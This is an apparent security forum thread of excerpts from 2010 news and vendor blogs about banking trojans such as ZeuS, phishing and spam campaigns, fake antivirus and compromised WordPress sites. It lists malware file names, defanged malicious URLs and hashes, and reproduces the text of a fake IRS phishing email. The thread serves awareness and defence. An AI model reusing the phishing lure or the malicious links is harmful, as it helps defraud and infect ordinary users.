Hacks steal $120M+ in 3 months: FDIC
- http://www.computerworld.com/s/article/9167598/FDIC_Hackers_took_more_than_120M_in_three_months?
March 8, 2010 - "Ongoing computer scams targeting small businesses cost U.S. companies $25 million in the third quarter of 2009, according to the (FDIC). Online banking fraud involving the electronic transfer of funds has been on the rise since 2007 and rose to over $120 million in the third quarter of 2009, according to estimates presented Friday at the RSA Conference in San Francisco, by David Nelson, an examination specialist with the FDIC. The FDIC receives a variety of confidential reports from financial institutions, which allow it to generate the estimates, Nelson said. Almost all of the incidents reported to the FDIC "related to malware on online banking customers' PCs," he said. Typically a victim is tricked into visiting a malicious Web site or downloading a Trojan horse program that gives hackers access to their banking passwords. Money is then transferred out of the account using the Automated Clearing House (ACH) system that banks use to process payments between institutions. Even though banks now force customers to use several forms of authentication, hackers are still stealing money. "Online banking customers are getting too reliant on authentication and on practicing layers of controls," Nelson said... Commercial deposit accounts do not receive the reimbursement protection that consumer accounts have, so a lot of small businesses and nonprofits have suffered some relatively large losses," Nelson said. "In the third quarter of 2009, small businesses suffered $25 million in losses due to online ACH and wire transfer fraud." That's led to some nasty legal disputes, where customers say the banks should have stopped payments, and the banks argue that the customers should have protected their own computers from infection. Often small businesses do not have the controls in place to prevent unauthorized ACH payments, even when their banks make them available, Nelson said. "Hackers are definitely targeting higher-balance accounts and they're looking for small businesses where controls might not be very good." The FDIC's estimates are "reasonable," but they illustrate a problem that is becoming too expensive for banks and businesses, said Avivah Litan, an analyst with Gartner. She said that attacks that install a password-stealing botnet program, known as Zeus, have increased so far in 2010, so those losses may be even higher this year."
:fear::mad:
AplusWebMaster
2010-03-11, 20:49
FYI...
iPad giveaway gives users identities away
- http://blog.trendmicro.com/ipad-giveaway-gives-users%E2%80%99-identities-away/
Mar 9, 2010 - "... spammed messages that promise free iPads to lure unwitting users into their scams. In one such spam sample, recipients are being invited to test the iPad at no cost by simply applying to be part of a “word-of-mouth” marketing campaign. They may not have to shell out a single cent but the price they have to pay will be their identities... The spammed messages instruct users to reply to the email with their personal information, which spammers could easily use for further malicious activities... This recent spam run is no different from how cybercriminals leveraged the iPad launch in January, which led to a FAKEAV variant. Users should thus continue exercising caution in opening email messages from unknown senders. It is also important to be cautious in conducting Web searches on hot topics such as the iPad, as these are often used for blackhat search engine optimization (SEO) attacks... Apple does not own any iPad-related domain names so users should really pay close attention to URLs before they click."
(Screenshots available at the URL above.)
:fear::mad::fear:
AplusWebMaster
2010-03-13, 14:31
FYI...
IC3 2009 Internet Crime Annual Report
- http://www.ic3.gov/media/2010/100312.aspx
March 12, 2010 - "... Online crime complaints increased substantially once again last year, according to the report. The IC3 received a total of 336,655 complaints, a 22.3 percent increase from 2008. The total loss linked to online fraud was $559.7 million; this is up from $265 million in 2008... Although the complaints consisted of a variety of fraud types, advanced fee scams that fraudulently used the FBI's name ranked number one (16.6 percent). Non-delivery of merchandise and/or payment was the second most reported offense (11.9 percent)... The report is posted in its entirety on the IC3 website*. The Internet Crime Complaint Center (IC3) is a joint operation between the FBI and the National White Collar Crime Center (NW3C). IC3 receives, develops, and refers criminal complaints regarding the rapidly expanding arena of cyber crime. The IC3 gives the victims of cyber crime a convenient and easy-to-use reporting mechanism utilized to alert authorities of suspected criminal or civil violations..."
* http://www.ic3.gov/media/annualreports.aspx
[ Replace the word “complaints” with “citizen-reported-criminal-activity”… ‘do same in the actual report itself. ]
- http://www.eset.com/blog/2010/03/17/were-not-talking-peanuts-here
March 17, 2010 - "... these figures relate only to the USA. Multiply those amounts many times over to give you some idea of the size of the losses on a global basis. The amount of money that is lost to global cybercrime activities is massive... because the size of the problem is often not understood, it seems to slip under the radar and often isn’t even considered a serious problem... The drug trade problem has plenty of awareness in the public eye and plenty of focus from law enforcement. Yet in fact the global cybercrime trade makes more money these days than the global drug trade..."
:fear::mad::fear:
AplusWebMaster
2010-03-14, 18:28
FYI...
ZeuS detection on your PC...
- http://www.secureworks.com/research/threats/zeus/
March 11, 2010 - "... How to detect the ZeuS Banking Trojan on your computer
Computers infected with this version of ZeuS will have the following files and folders installed. The location depends on whether the victim has Administrator rights. The files will most likely have the HIDDEN attribute set to hide them from casual inspection...
sdra64.exe (malware)
user.ds (encrypted stolen data file)
user.ds.lll (temporary file for stolen data)
local.ds (encrypted configuration file)
The sdra64.exe program uses process injection to hide its presence in the list of running processes. Upon startup, it will inject code into winlogon.exe (if Administrator rights available) or explorer.exe (for non-Administrators) and exit. The injected code infects other processes to perform its data theft capabilities..."
(More detail available at the URL above.)
:mad::mad:
AplusWebMaster
2010-03-18, 00:08
FYI...
Online stock trading is risky
- http://www.f-secure.com/weblog/archives/00001909.html
March 17, 2010 - "Buying and selling stock online is big business. It also carries it's own risks. And we don't mean the risk of doing bad investments; we mean loosing access to your trading account because your computer got infected by a keylogger. Take a case of Mr. Valery Maltsev from St. Petersburg. Maltsev runs an investment company called Broco Investments... Unfortunately (to him), Maltsev was yesterday charged by US Securities & Exchange commission. They claim that Maltsev's extraordinary gains in thinly traded NASDAQ and NYSE stocks were not a co-incidence. Apparently Maltsev used malware with keyloggers to gain access to other people's online trading accounts. With such accounts, he could buy stocks at inflated prices, and use his real account to sell the same stock, for instant gains. Quoting from the SEC Complaint:
On December 21,2009, at 13:37, BroCo bought shares of Ameriserv Financial, Inc (ASRV) at a price of $1.51 per share. Approximately one minute later, three accounts at Scottrade were illegally accessed and used to purchase shares of ASRV at prices ranging from $1.545 to $1.828 per share. While this was happening, BroCo sold shares of ASRV at prices ranging from $1.70 to $1.80 per share, finishing at 13:52. By trading shares of ASRV within minutes of unauthorized trading through the compromised accounts, Maltsev and BroCo grossed $141,500 in approximately fifteen minutes, realizing a net profit of $17,760 ..."
- http://www.theregister.co.uk/2010/03/16/pump_and_dump_hacking/
16 March 2010 - "... The scheme earned at least $255,532 from August to December at a cost of $603,000 to broker-dealers, which had to reimburse customers... The lawsuit seeks an order freezing the Genesis accounts and requiring Maltsev to repay the lost funds..."
:eek::mad:
AplusWebMaster
2010-03-18, 16:08
FYI...
Battery recharger software trojan - more...
- http://www.theregister.co.uk/2010/03/18/energizer_battery_trojan_returns/
18 March 2010 - "... the file that spreads the infection was -still- being distributed Wednesday evening on a European site operated by the consumer-products company. According to this VirusTotal analysis*, UsbCharger_setup_V1_1_1.exe is flagged as malicious by 24 of the 42 leading anti-virus firms. To make sure it wasn't a false positive, The Register checked with anti-virus firms Immunet and Trend Micro, both of which said the infection is real. Contrary to the VirusTotal results, the threat is also flagged by Symantec's Norton AV app, Immunet added. Trend Micro Senior Threat Researcher Paul Ferguson said his company's AV product also protects against it by flagging a key dll file, rather than the executable file. Microsoft labels the trojan as Arurizer.A and warns that it installs a backdoor on user machines that allows attackers to upload, download, and delete files at will, install additional malware and carry out other nefarious deeds. Twelve days ago, Energizer pledged to mount an investigation into how such a gaffe could have happened. The company has yet to release the results of that probe... Sometimes, the low-tech - or no-tech - solution is the way to go."
* http://www.virustotal.com/analisis/76776094c46a6d9c4315489c339a124a121a0776b16bef9a661156864b6eb1d7-1268871703
File UsbCharger_setup_V1_1_1.exe received on 2010.03.18 00:21:43 (UTC)
Result: 24/42 (57.14%)
:mad::mad:
AplusWebMaster
2010-03-18, 22:23
FYI...
Zeus trojan campaign Warning - SPAM
- http://www.us-cert.gov/current/#us_cert_warns_against_zeus
March 17, 2010 - "US-CERT is aware of public reports of malicious code circulating via spam email messages impersonating the Department of Homeland Security (DHS). The attacks arrive via unsolicited email messages that may contain subject lines related to DHS or other government activity. These messages may contain a link or attachment. If users click on this link or open the attachment, they may be infected with malicious code, including the Zeus Trojan..."
:mad::mad:
AplusWebMaster
2010-03-19, 13:44
FYI...
Naming and Shaming ‘Bad’ ISPs
- http://www.krebsonsecurity.com/2010/03/naming-and-shaming-bad-isps/
March 19, 2010 - "Roughly two years ago, I began an investigation that sought to chart the baddest places on the Internet, the red light districts of the Web, if you will. What I found in the process was that many security experts, companies and private researchers also were gathering this intelligence, but that few were publishing it... Fast-forward to today, and we can see that there are a large number of organizations publishing data on the Internet’s top trouble spots... Brett Stone-Gross, a PhD candidate in UCSB’s Department of Computer Science, said he and two fellow researchers there sought to locate ISPs that exhibited a consistently bad reputation... “The networks you find in the FIRE rankings* are those that show persistent and long-lived malicious behavior,” Stone-Gross said... For instance, if you click this link** you will see the reputation history for ThePlanet.com..."
Top 20 Malicious Autonomous Systems...
* http://maliciousnetworks.org/index.php
** http://maliciousnetworks.org/chart.php?as=AS21844
- http://maliciousnetworks.org/chart.php?as=AS15169
:fear::fear:
AplusWebMaster
2010-03-22, 02:36
FYI...
Twitter phishing attack...
- http://www.f-secure.com/weblog/archives/00001911.html
March 21, 2010 - "Today there's a phishing run underway in Twitter, using Direct Messages ("DMs"). These are private one-to-one Tweets inside Twitter... If you mistakenly give out your credentials, the attackers will start sending similar Direct Messages to your contacts, posing as you. The ultimate goal of the attackers is to gain access to a large amount of valid Twitter accounts, then use these accounts to post Tweets with URLs pointing to malicious websites which will take over users computers when clicked... The good news is that Twitter is already filtering these from being posted, although it's unclear if they are also removing already-delivered DMs. Also, the Twitter built-in link shorteners (twt.tl and bit.ly) already detect the URLs as malicious."
(Screenshots available at the URL above.)
:mad:
AplusWebMaster
2010-03-22, 15:25
FYI...
Malicious medical ads flood users’ Inboxes
- http://blog.trendmicro.com/malicious-medical-ads-flood-users%E2%80%99-inboxes/
Mar. 21, 2010 - "TrendLabs observed an increase in malicious medical advertisements spammed to users’ e-mail inboxes. Two of the samples our engineers obtained looked legitimate, even had professional-looking graphics... Another was just the normal, everyday, plain-text spam... The spammed messages enticed recipients to purchase the medicines the scammers were selling. These lured recipients with supposed huge discounts, ranging from 70–80% off of all products. The messages also sported links that when clicked redirected users to a spoofed online store that sold male organ-enhancing pills. More recently, a spam run that uses a new feature was discovered. Instead of asking recipients to click an embedded link or an image, it asked them to open the .JPG file attachment—an image of Viagra and Cialis—along with the line, “DO NOT CLICK, JUST ENTER (a particular URL) IN YOUR BROWSER.” The spammed messages also contained a series of salad words to avoid being filtered..."
(Screenshots available at the URL above.)
:fear::mad:
AplusWebMaster
2010-03-23, 16:41
FYI...
Facebook "Dislike button" likes Hotbar
- http://sunbeltblog.blogspot.com/2010/03/facebook-dislike-button-likes-hotbar.html
March 23, 2010 - "... It seems the tactic of offering up Firefox (but giving you something else entirely) is going to be around for a little while. Below is a site promoting a Firefox .xpi called “The Dislike Button”, designed to let you add an “I dislike this” note to Facebook posts... The domain is dislikes(dot)info. Note the “Get Firefox” button at the top... you’re given the option of downloading a setup file from Hotbar…not exactly the Firefox download you were expecting. Should the end-user install it thinking this will give them Firefox, they’re very much mistaken... What they actually get is the option to download Hotbar (and no Firefox), complete with a preticked ShopperReports checkbox... Additionally, there’s a text link further down the page asking you to “Get Firefox now” which also directs you to the Hotbar install... I think... I dislike this."
(Screenshots available at the URL above.)
:mad:
AplusWebMaster
2010-03-23, 19:45
FYI...
Skype toolbar for Outlook SCAM
- http://securitylabs.websense.com/content/Alerts/3586.aspx
03.23.2010 - " Websense... has discovered a new wave of email attacks targeting the Skype Email Toolbar. Up to now, the amount of spam is not large, but we believe it will increase. The spam email message contains a file attachment named SkypeToolbarForOutlook.zip, which could easily deceive users but is in fact a backdoor trojan that has a very low AV detection*. The spam email copies the look and feel of the legitimate application from Skype..."
* http://www.virustotal.com/analisis/9c04944960cc8abac04cb319c9e98856cf070331ab482d6372ad10a5a6d92751-1269327702
File SkypeToolbarForOutlook.exe received on 2010.03.23 07:01:42 (UTC)
Result: 6/42 (14.29%)
(Screenshots available at the Websense URL above.)
Skype SPIM (Instant Messaging SPAM)
- http://www.m86security.com/labs/i/Skype-SPIM-Instant-Messaging-Spam--,trace.1289~.asp
March 26, 2010 - With over 520 million users, Skype is the most popular VoIP (Voice over IP) application available today. It provides a great service, allowing families, friends and colleagues to connect to one another through voice and video chat across the globe. However, being so popular doesn’t come without a price. The price that is paid is in the form of Skype SPIM (Instant Message Spam). These messages are pushed out to a large percentage of Skype users on a regular basis. The SPIM messages can range from the common pharmaceutical product spam, to fake OEM software, investment scams, replica bags and watches, and adult dating site spam..."
(More detail and screenshots at the URL above.)
:mad:
AplusWebMaster
2010-03-24, 12:54
FYI...
ZBOT variants targeting European Banks
- http://blog.trendmicro.com/new-zbot-variants-targeting-european-banks/
March 23, 2010 - "... new ZBOT variant mainly targeting four European countries’ banking systems in Italy, England, Germany, and France. Trend Micro detects this variant as TROJ_ZBOT.BYP. It targets major consumer European Banks and financial institutions with high-profile clientele. The targeted companies include the major UniCredit Group Subsidiary Bank of Rome; U.K.-based Abbey National (more commonly known as Abbey); Hong Kong’s HSBC; Germany’s leading IT service provider in the cooperative financial system, the FIDUCIA Group; and one of France’s largest retail banks, Crédit Mutuel... The ZeuS toolkit enables cybercriminals to create and customize their own remote-controlled malware. The infected machine then becomes part of the criminal ZeuS botnet. ZBOT variants are information stealers specializing in robbing online banking information from victims and sending back the information to its command-and-control (C&C) server. At its most basic level, ZeuS has always been known for engaging in criminal activities, as it signals a new wave of online criminal business enterprises wherein different organizations can cooperate with one another to perpetrate outright online theft and fraud... The domains used by TROJ_ZBOT.BYP are both hosted on the same server, which is located in Serbia under a registered name. The IP address used and its registered name are both well-known for being part of FAKEAV-hosting domains and previous Canadian pharmacy spam campaigns..."
- http://threatinfo.trendmicro.com/vinfo/web_attacks/ZeuS_ZBOTandKneberConnection.html
"... Since 2007... Trend Micro has seen over 2,000 ZBOT detections and the numbers continue to rise..."
:mad:
AplusWebMaster
2010-03-25, 02:12
FYI...
Fake Apple App Store Malicious SPAM
- http://securitylabs.websense.com/content/Alerts/3587.aspx
03.24.2010 - "Websense... has discovered that Apple's App Store has become the latest target for email attacks and spam. App Store is the service provided by Apple Inc. as a platform to purchase and download applications for iPhone®, iPod touch®, and iPad™. The attack comes in the form of a fake invoice email. With Apple's App Store being one of the most popular shopping platforms for multimedia, this kind of App Store invoice email is familiar to users and tends to be received frequently. As demonstrated here, cyber-criminals clearly jump at a chance to spread their spam using any available means. The content in this campaign resides on compromised Web sites and serves a combination of pharmaceutical spam along with exploits that are delivered in the background. Some of the messages serve only pharmaceutical spam and some combine spam with exploits. In the example below, clicking the link in the message redirects the user to a site with a single link labeled "visit". In the background, a known exploit pack called "Eleonore" is delivered to the user's machine. If the user clicks on the link, they are redirected to a "Canadian Pharmacy" Web site. In this particular attack instance the file dropped by the exploit pack has 29% detection rate*..."
* http://www.virustotal.com/analisis/5e99fa5527e737e38ecea80c5a9d40759003f739fe6649cb501496a884ad75ae-1269442230
File updates.exe received on 2010.03.24 14:50:30 (UTC)
Result: 12/41 (29.27%)
(Screenshots available at the Websense URL above.)
- http://blog.trendmicro.com/spammers-spoof-the-apple-store/
Mar. 25, 2010
:mad:
AplusWebMaster
2010-03-25, 02:29
FYI...
Pictures Ruse Used to SPAM Zeus/Zbot
- http://blog.trendmicro.com/spam-with-%E2%80%9Cpictures%E2%80%9D-used-to-spread-zbot/
Mar. 24, 2010 - "... fresh wave of spammed messages that were used to spread another ZBOT variant of the infamous ZeuS botnet. These messages warned users that a “jerk” posted photos of them and contained a link to the said images... the spammed messages appear to be from innocent users that the recipients presumably knew. In addition, they were also signed or at least had the sender’s name at the end of the message. In the sample above, the sender’s name has been blurred to protect his/her identity. Combined, this may lead users to believe the message is legitimate. However, the link does not go to any legitimate social-networking or photo-hosting site. Users were instead prompted to download a “photo archive”. In addition, the download page also contains a malicious iframe, which leads to a website that previously hosted the Phoenix Exploit’s Kit, which was designed to take advantage of vulnerabilities in several popular applications like Adobe Flash, Internet Explorer (IE), Microsoft Office, and Mozilla Firefox..."
(Screenshots available at the URL above.)
- http://threatinfo.trendmicro.com/vinfo/articles/securityarticles.asp?xmlfile=030210-ZBOT.xml
- http://ddanchev.blogspot.com/2010/03/zeus-crimewareclient-side-exploits.html
March 24, 2010 - "... Updates will be posted as soon as new developments emerge. Consider going through the 'related posts', to catch up with the gang's activities for Q1, 2010..." ("Related posts" listed there)
:mad:
AplusWebMaster
2010-03-25, 23:17
FYI...
Closer look on Swizzor
- http://techblog.avira.com/2010/03/25/closer-look-on-swizzor/en/
March 25, 2010 - "We were analysing a recent version of Swizzor – an Adware which Avira detects as TR/Dldr.Swizzor.Gen – and after getting past the first encryption layers of the software, we stumbled over a few interesting strings in the malware. Quite obviously it installs a browser helper object (BHO, an Internet Explorer plug-in) which does some form of search hijacking. In case users get infected with Swizzor, they usually experience a -redirected- start page and a few pop-ups with advertisements for online poker or potency pills... Different Swizzor samples contain also different messages and links. Also, the malware is highly polymorphic. The Swizzor sample also contains a lengthy list of URLs which it blocks within the windows hosts file by redirecting them to localhost (127.0.0.1). Interestingly, those URLs all point to FakeAV or RogueAV... Also we see reports by users on the net which are victim of a Swizzor infection and didn’t download such “sponsored software” knowingly, but installed it for example with the “Windows Live Messenger” -add-on “Windows Live Plus! Messenger” where users can choose whether to install the “sponsor software” or not. Always keep an open eye whether the software you are going to install really is free or installs further stuff to your computer. You should find hints pointing to such add-ons in the EULA of the software."
:fear:
AplusWebMaster
2010-03-26, 01:15
FYI...
Fake lawsuit notification Attack
- http://www.f-secure.com/weblog/archives/00001917.html
March 25, 2010 - "A few of days ago, we encountered an e-mail with a malicious RTF attachment. It was sent with a supposed lawsuit notification message. The e-mail didn't mention any company by name and took a shotgun, rather than targeted, approach... At this point, it appears that the attachment has been replaced by hyperlink pointing to the Marcus Law Center... It is difficult to determine whether or not the MLC site is compromised or just completely bogus. Their Our Firm page text borrows heavily from a New York lawyer's site, but that could just be a case of "honest" plagiarism. In any case, our browsing protection feature is now blocking the sub-directory hosting the malicious file as unsafe. The RTF file includes an embedded object that acts as a trojan dropper (Trojan-Dropper:W32/Agent.DIOY) and it drops a downloader (Trojan-Downloader:W32/Lapurd.D), which then attempts to connect to a server located in Southern China. The earlier attachment that we saw also attempted to connect to a server in China. Updated to add: SANS diary reports* that a number of .edu sites have also received a similar message. The domain, touchstoneadvisorsonline .com, is hosting the same RTF (.doc) file. .."
* http://isc.sans.org/diary.html?storyid=8497
Last Updated: 2010-03-25 13:30:36 UTC - "An email is being sent out warning the recipient of a "Copyright Lawsuit filed against you." We received a copy here and a number of .EDUs have reported it's receipt... Currently only a few AV solutions detect the initial document:
- http://www.virustotal.com/analisis/9b762ff9d2103022bf1476f2c55db91475f31526522716e827875801f92a0d87-1269486837 ..."
File r439875.doc-25mar10 received on 2010.03.25 03:13:57 (UTC)
Result: 7/42 (16.67%)
- http://isc.sans.org/diary.html?storyid=8506
Last Updated: 2010-03-26 14:19:15 UTC
> http://www.virustotal.com/analisis/bde73e8d9df88795b32679bf3c489ce4e39f29ca3e55ce00cbf497335a24c8ee-1269619641
File suit.exe received on 2010.03.26 16:07:21 (UTC)
Result: 21/42 (50.00%)
- http://www.us-cert.gov/current/#copyright_infringement_lawsuit_email_scam
March 26, 2010 - "... messages may contain malicious attachments or web links. If a user opens the attachment or follows the link, malicious code may be installed on the user's system..."
- http://ddanchev.blogspot.com/2010/03/copyright-lawsuit-filed-against-you.html
March 29, 2010
:mad:
AplusWebMaster
2010-03-26, 17:02
FYI...
Zeus wants to do your taxes
- http://isc.sans.org/diary.html?storyid=8503
Last Updated: 2010-03-25 20:44:53 UTC ...(Version: 2) - "... received reports of suspicious emails claiming to be from the IRS. It's a common scheme to get a user to click and run an executable. It looks like zeus/zbot to me...The email looks something like...
Subject: Underreported Income Notice
Taxpayer ID: <recipient>-00000198499136US
Tax Type: INCOME TAX
Issue: Unreported/Underreported Income (Fraud Application)
Please review your tax statement on Internal Revenue Service (IRS) website (click on the link below):
Internal Revenue Service
hxxp ://www.irs.gov.assewyx .co.uk/fraud.applications/application/statement.php?
The download in this particular link was "tax-statement.exe"..."
Child Tax Credit... Phishing Bait
- http://www.symantec.com/connect/blogs/child-tax-credit-new-phishing-bait
March 25, 2010
- http://www.us-cert.gov/current/#us_tax_season_phishing_scams
March 26, 2010 - "... tax season malware campaign. This malware campaign may be using malicious code commonly known as Zeus or Zbot..."
- http://www.irs.gov/privacy/article/0,,id=179820,00.html?portlet=5
"... The IRS does -not- initiate taxpayer communications through e-mail..."
:mad:
AplusWebMaster
2010-03-29, 19:48
FYI...
Fake update utilities...
- http://www.theregister.co.uk/2010/03/29/software_update_trojan/
29 March 2010 - "Miscreants have begun creating malware that overwrites software update applications from Adobe and others. Email malware that poses as security updates from trusted companies is a frequently used hacker ruse. Malware posing as update utilities, rather than individual updates, represents a new take on the ruse... recently detected Fakeupver trojan establishes a backdoor on compromised systems while camouflaging its presence by posing as an Adobe update utility. The malware camouflages itself by using the same icons and version number as the official package... "... malware is written in Visual Basic, faking such popular programs as Adobe, DeepFreeze, Java, Windows, etc. In addition, on being executed, they immediately turn on the following services: DHCP client, DNS client, Network share and open port to receive hacker’s commands..."
:mad:
AplusWebMaster
2010-03-30, 04:59
FYI...
Fake Facebook AV
- http://www.f-secure.com/weblog/archives/00001920.html
March 29, 2010 - "Facebook-specific antivirus application sound like a good idea? Maybe not. One of our analysts saw this particular application claiming to be an antivirus wreak havoc on his Friends list. Of course, there is no such thing... If a Friend looking through the photos then clicks on the app's (apparently randomly generated) link... you might end up with a series of albums... Once installed on one Friend's account, this application tags 20 Friend into a picture... You can find more information about this, including instructions on how to remove the tags on the photos, at FacebookInsider*.
Updated to add: Examples include Antivirus in Focebook and F'acebook antivirus.
Notice the -misspelling- of Facebook in both names. Facebook is already in the process removing and preventing such rogue apps."
(Screenshots available at the URL above.)
* http://thefacebookinsider.com/2010/03/warning-facebook-antivirus-will-virally-spam-your-friends/
:mad:
AplusWebMaster
2010-04-01, 15:10
FYI...
SPAM site registrations flee China for Russia - A Little Sunshine
- http://www.krebsonsecurity.com/2010/03/spam-site-registrations-flee-china-for-russia/
March 31, 2010 - "... In early January 2010, and indeed in the months leading up to the new year, the percentage of domains advertised in spam registered in the .cn space dwarfed the number of .ru spam-related domains, according to figures gathered by the University of Alabama at Birmingham. But by mid-January, the number of .cn spam domains began to fall off dramatically, while the number of .ru spam domains increased markedly, UAB found (see graphic*). Gary Warner, director of research in computer forensics at UAB Birmingham, said a sizable share of spam-related new domain registrations continue to come through the .com space — which is served by hundreds of domain name registrars. But he said the biggest bulk registrations for spam domains routinely came out of .cn, particularly those associated with rogue online pharmacies. “The .com never had the volumes of abuse you’d see at one time in .cn, where you’d typically have one guy registering hundreds or thousands of spam domains every day,” Warner said. There is a decent chance that the spammers will move to another country-code registrar soon. Beginning April 1, Russia’s Coordination Center for domain registration will require individuals and businesses applying for a .ru address to provide a copy of a passport or legal registration papers. Warner said he’s looking forward to seeing a similar exodus from Russia in the weeks ahead. “I’m excited about the prospects of seeing the [number of] .ru spam domains going down just like we saw with China,” he said... ISC’s spam traps had identified more than 10,000 unique domain names being advertised in spam. More than 1,870 of those domains were tied to recently registered rogue pharmacies, and of those, 491 were registered in the .com space, while 18 were from .cn and 1,366 were at .ru Web sites..."
* http://www.krebsonsecurity.com/wp-content/uploads/2010/03/cnruspam.jpg
:fear::fear:
AplusWebMaster
2010-04-08, 06:04
FYI...
Korea: 31% of malware origins - March 2010
- http://sunbeltblog.blogspot.com/2010/04/number-of-infected-computers-spikes-in.html
April 07, 2010 - Number of infected computers spikes in Korea - "Hong Kong-based security firm Network Box reported that Korea was the country of origin for 31.1 percent of the malware on the Internet in March*. In February the country only pumped out 8.9 percent, leading researchers to theorize that there has been a huge increase in infected machines there pushing out phishing spam. Network Box includes phishing in its calculations of monthly malware statistics. They also include North and South Korea as one country in their categories, but say the lack of public computers in the North means that South Korea is the country of origin for the bulk of the statistic. The US was second on the list at 9.34 percent..."
* http://www.infosecurity-us.com/view/8547/korea-reigns-as-king-of-malware-threats-/
- http://response.network-box.com/
:fear::mad:
AplusWebMaster
2010-04-09, 23:36
FYI...
Facebook SCAM again - fake Ikea page...
- http://www.computerworld.com/s/article/9175158/Scam_Facebok_page_attracts_40_000_victims_seeking_Ikea_gift_card?taxonomyId=17
April 9, 2010 - "... latest example of a new and pernicious trend on the social-networking site as scammers - usually disreputable online marketers trying to earn review by generating Web traffic - have flooded Facebook with these fake gift card pages over the past months. In late March, a similar $1,000 Ikea gift card scam took in more than 70,000 victims, and just last week another scam Facebook page offering a $500 Whole Foods gift certificate was widely reported. Friday's scam page had taken in more than 37,000 users by 11:30 a.m. Pacific Time, offering them a $1,000 gift certificate in exchange for promoting Ikea to their friends. At that time, the page was gaining new fans at the rate of about 5,000 per hour. The promotion, the page said, was only available for one day. To participate, users must become a fan of the fake Ikea page, hosted on Facebook, and then invite all their friends to become fans. They are then directed to an affiliate marketing page hosted by GiftDepotDirect .com, where they are asked personal information such as name, address, date of birth and home telephone number. After that step, the victim is told to sign up for two online marketing offers - these ones with legitimate Web sites such as Netflix and CreditReport .com - in order to claim the gift card. The promised cards in these scams never show up..."
:fear::mad:
AplusWebMaster
2010-04-10, 21:14
FYI...
Wordpress blogs hit by ‘Networkads.net’ hack
- http://krebsonsecurity.com/2010/04/hundreds-of-wordpress-blogs-hit-by-networkads-net-hack/
April 9, 2010 - "A large number of bloggers using Wordpress are reporting that their sites recently were hacked and are redirecting visitors to a page that tries to install malicious software. According to multiple postings on the Wordpress user forum and other blogs, the attack doesn’t modify or create files, but rather appears to inject a Web address — “networkads .net/grep” — directly into the target site’s database, so that any attempts to access the hacked site redirects the visitor to networkads .net. Worse yet, because of the way the attack is carried out, victim site owners are at least temporarily locked out of accessing their blogs from the Wordpress interface. It’s not clear yet whether the point of compromise is a Wordpress vulnerability (users of the latest, patched version appear to be most affected), a malicious Wordpress plugin, or if a common service provider may be the culprit. However, nearly every site owner affected so far reports that Network Solutions is their current Web hosting provider... A scan of the file delivered by that redirect shows rather poor detection by most anti-virus products: Virustotal.com found that only 7 out of 39 anti-virus products detected it as malicious*...
The following how-to-repair instructions appear to have worked for a number of Network Solutions customers hit by this attack.
- Log in to your site at networksolutions.com
- Using Network Solution’s MySQL admin console, browse to the wp_options table and change the value for “siteurl” to your blog’s URL . For example: “http://example.com/wordpress”.
- Edit wp_config.php to override value of SITEURL (this way even if the database value is altered, it gets overridden by the config value.
Still, that fix may only be temporary ..."
* http://www.virustotal.com/analisis/39d86b03319e2636a1e0b869fa4b89ed7adcebb61d8ad1000797cab84b03e777-1270828595
File 8d2c18111ad5d4815c4b610c0fa30043e received on 2010.04.09 15:56:35 (UTC)
Result: 7/39 (17.95%)
- http://google.com/safebrowsing/diagnostic?site=networkads.net/
"Site is listed as suspicious - visiting this web site may harm your computer...
last time Google visited this site was on 2010-04-09, and the last time suspicious content was found on this site was on 2010-04-09... Malicious software includes 29 exploit(s), 4 trojan(s)..."
- http://blog.sucuri.net/2010/04/details-on-network-solutions-wordpress.html
April 10, 2010
Alert: WordPress Blog & Network Solutions
- http://blog.networksolutions.com/2010/alert-wordpress-blog-network-solutions/
Update: 04/10/2010
- http://blog.trendmicro.com/wordpress-blogs-suffer-mass-compromise/
Apr. 11, 2010
:mad::fear:
AplusWebMaster
2010-04-13, 16:04
FYI...
Facebook game Farm Town serving "malvertisement"...
- http://www.theregister.co.uk/2010/04/12/farm_town_malicious_ads/
12 April 2010 - "... Facebook game with more than 9 million users... Farm Town..."
>>> http://msmvps.com/blogs/spywaresucks/archive/2010/04/12/1763312.aspx
Apr 12 2010 18:55 - "... screenshot of the malvertisement... (leads to) run-of-the-mill fake antivirus software..."
- http://msmvps.com/blogs/spywaresucks/archive/2010/04/12/1763300.aspx
Apr 12 2010 16:45
:mad:
AplusWebMaster
2010-04-13, 18:34
FYI...
Copyright ransomware in the Wild...
- http://ddanchev.blogspot.com/2010/04/copyright-violation-alert-themed.html
April 12, 2010 - "The copyright violation alert themed ransomware campaign (Copyright violation alert ransomware in the wild; ICPP Copyright Foundation is fake*) is not just a novel approach for extortion of the highest amount of money seen in ransomware variants so far, but also, offers interesting clues into the multitasking mentality of the cybercriminals whose campaigns have already been profiled..."
* http://www.f-secure.com/weblog/archives/00001931.html
SSDD ...
- http://isc.sans.org/diary.html?storyid=8620
Last Updated: 2010-04-13 13:35:41 UTC
:mad:
AplusWebMaster
2010-04-16, 14:17
FYI...
Q1 2010: 0-day exploit deliveries...
- http://blog.scansafe.com/journal/2010/4/9/attackers-triple-play-to-deliver-zero-days.html
April 9, 2010 - "ScanSafe STAT has been investigating an ongoing series of attacks which has been a hotbed for zero day exploits over the first quarter of 2010. The attackers are using three layers of legitimate sites. Two layers are compromised websites used to host malicious content that is then subsequently pushed to a third layer of legitimate websites via syndicated ads. In its current rendition, the attacks are being delivered to finanical services themed websites. Previous rounds have been delivered via syndicated ads on Wikia-hosted websites and assorted game forums. The ads pull content from an attacker-planted HTML file contained in the /images directory of the compromised site. (Method of compromise is not known, but it's presumed to be a result of stolen FTP credentials)... Through the course of these attacks which began in late January, the attackers have been quick to incorporate the latest zero day du jour. These have included:
CVE-2010-0806 Internet Explorer uninitialized memory corruption vulnerability
CVE-2009-4324 "use-after-free" vulnerability in Adobe Reader/Acrobat
CVE-2009-3867 HsbParser.getSoundBank buffer overflow vulnerability in Sun Java
Mixed in with these have been an assortment of older exploits for Adobe Flash, Microsoft DirectShow, and miscellaneous Adobe Reader/Acrobat PDF exploits. Successful exploit leads to the download of a binary (also hosted on the same domain) which in observed cases has been a variant of the Bredolab trojan... Bredolab acts as a downloader agent. In the cases we've observed, this particular variant of Bredolab is downloading Zbot/Zeus. Encounters with these attacks are fairly steady and comprised 1% of all ScanSafe Web malware blocks in March (compared to Gumblar at 17%). What's particularly interesting about these attacks isn't the volume, but rather that they appear to be a vector for rapid deployment of the latest zero day exploits. And while the IP addresses and domain names for the attacker-owned sites have changed, the delivery method has remained constant."
:fear::mad::fear:
AplusWebMaster
2010-04-19, 00:31
FYI...
songlyrics .com... hacked/serving exploits
